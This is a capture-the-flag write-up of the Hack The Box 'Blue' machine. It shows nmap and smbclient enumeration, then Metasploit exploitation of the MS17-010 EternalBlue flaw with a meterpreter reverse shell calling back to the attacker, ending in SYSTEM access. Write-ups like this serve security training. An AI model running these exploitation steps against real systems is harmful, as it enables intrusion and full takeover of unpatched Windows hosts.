Blue Writeup
10 September 2022 #CTF #HTB #box #easy #windows
Enumeration
We will start with an nmap scan:
$ sudo nmap -F -sC -sV -oN enum/blue 10.10.10.40
[...]
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
Host script results:
| smb2-security-mode:
| 2.1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
[...]
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2022-08-08T11:22:26+01:00
[...]
SMB
Our nmap scan informed us that we have anonymous access so let's list the shares:
$ smbclient -N -L 10.10.10.40
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
Share Disk
Users Disk
There are 2 non-default shares: Share and Users.
$ smbclient -N '//10.10.10.40/Share'
smb: \> ls
. D 0 Fri Jul 14 09:48:44 2017
.. D 0 Fri Jul 14 09:48:44 2017
Nothing in Share.
$ smbclient -N '//10.10.10.40/Users'
smb: \> ls
. DR 0 Fri Jul 21 02:56:23 2017
.. DR 0 Fri Jul 21 02:56:23 2017
Default DHR 0 Tue Jul 14 03:07:31 2009
desktop.ini AHS 174 Tue Jul 14 00:54:24 2009
Public DR 0 Tue Apr 12 03:51:29 2011
After looking a bit no intersting files where found (like a user.txt in Default\Desktop or Public\Desktop).
Since we have nothing (and the box is running Windows 7), we can further enumerate SMB by using some nmap scripts:
$ sudo nmap --script='smb-vuln-*' -p 139,445 10.10.10.40
This will run every nmap script that starts with 'smb-vuln-' on ports 139 and 445:
[...]
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
[...]
EXPLOITATION
The box is vulnerable to ms17-010, also known as 'Eternal Blue', one of the most well known vulnerabilities.
I'm going to use metasploit since it seems like the most reliable way to exploit Eternal Blue:
$ msfconsole
[...]
msf6 > search ms17-010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.10.40
RHOSTS => 10.10.10.40
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.10.14.4
LHOSTS => 10.10.14.4
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[...]
[+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[...]
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
and there it is, we are 'root'!
Key Takeaways
- Keep It Simple Stupid
- nmap has a lot of useful scripts (beyond
--script=default) - Sometimes using metasploit is the right choice